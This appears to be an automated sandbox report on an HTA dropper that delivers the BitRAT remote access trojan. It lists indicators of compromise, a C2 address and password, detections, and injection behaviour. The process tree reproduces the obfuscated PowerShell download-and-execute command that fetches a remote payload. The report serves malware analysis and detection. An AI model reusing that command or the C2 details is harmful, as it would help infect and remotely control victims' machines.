135.148.74.241_HCrypt.zip
135.148.74.241_HCrypt/PS1.hta
3KB
20-01-2022 14:34
37f9dc388fedc16b308acaadc34c2054
25c936c0b399b82ad39363f6237fd5db13369bda
f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3
Extracted
Language | ps1 |
Deobfuscated |
|
URLs |
exe.dropper
http://135.148.74.241/PS1_B.txt |
Extracted
Family | bitrat |
Version | 1.38 |
C2 |
135.148.74.241:8080 |
Attributes |
communication_password f1c1592588411002af340cbaedd6fc33
tor_process tor |
Filter: none
-
BitRAT
Description
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
Tags
-
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
Description
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
Tags
-
Blocklisted process makes network requestpowershell.exe
Reported IOCs
flow pid process 23 3744 powershell.exe 45 3744 powershell.exe -
Sets service image path in registry
Tags
TTPs
-
UPX packed file
Description
Detects executables packed with UPX/modified UPX open source packer.
Tags
Reported IOCs
resource yara_rule behavioral2/memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Checks computer location settingsmshta.exe
Description
Looks up country code configured in the registry, likely geofence.
TTPs
Reported IOCs
description ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of NtSetInformationThreadHideFromDebuggeraspnet_compiler.exe
Reported IOCs
pid process 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe -
Suspicious use of SetThreadContextpowershell.exe
Reported IOCs
description pid process target process PID 3744 set thread context of 1408 3744 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices
Description
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
TTPs
-
Modifies data under HKEY_USERSWaaSMedicAgent.exe
Reported IOCs
description ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe -
Suspicious behavior: EnumeratesProcessespowershell.exe
Reported IOCs
pid process 3744 powershell.exe 3744 powershell.exe -
Suspicious use of AdjustPrivilegeTokenpowershell.exeaspnet_compiler.exe
Reported IOCs
description pid process Token: SeDebugPrivilege 3744 powershell.exe Token: SeShutdownPrivilege 1408 aspnet_compiler.exe -
Suspicious use of SetWindowsHookExaspnet_compiler.exe
Reported IOCs
pid process 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe -
Suspicious use of WriteProcessMemorymshta.exepowershell.exe
Reported IOCs
description pid process target process PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Checks computer location settingsSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioNBlocklisted process makes network requestSuspicious use of SetThreadContextSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Suspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookEx
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe aed221520e0f14fb3027394fae42bfb3 C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.0Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
-
memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/3744-140-0x00000000068C5000-0x00000000068C7000-memory.dmp
-
memory/3744-136-0x0000000006CB0000-0x0000000006CD2000-memory.dmp
-
memory/3744-137-0x0000000006E80000-0x0000000006EE6000-memory.dmp
-
memory/3744-138-0x0000000007530000-0x0000000007596000-memory.dmp
-
memory/3744-139-0x0000000007A00000-0x0000000007A1E000-memory.dmp
-
memory/3744-135-0x00000000068C2000-0x00000000068C3000-memory.dmp
-
memory/3744-141-0x00000000091B0000-0x000000000982A000-memory.dmp
-
memory/3744-142-0x00000000080A0000-0x00000000080BA000-memory.dmp
-
memory/3744-143-0x0000000009010000-0x00000000090A6000-memory.dmp
-
memory/3744-144-0x0000000008FA0000-0x0000000008FC2000-memory.dmp
-
memory/3744-145-0x0000000009DE0000-0x000000000A384000-memory.dmp
-
memory/3744-134-0x0000000006F00000-0x0000000007528000-memory.dmp
-
memory/3744-133-0x00000000068C0000-0x00000000068C1000-memory.dmp
-
memory/3744-132-0x0000000004250000-0x0000000004286000-memory.dmp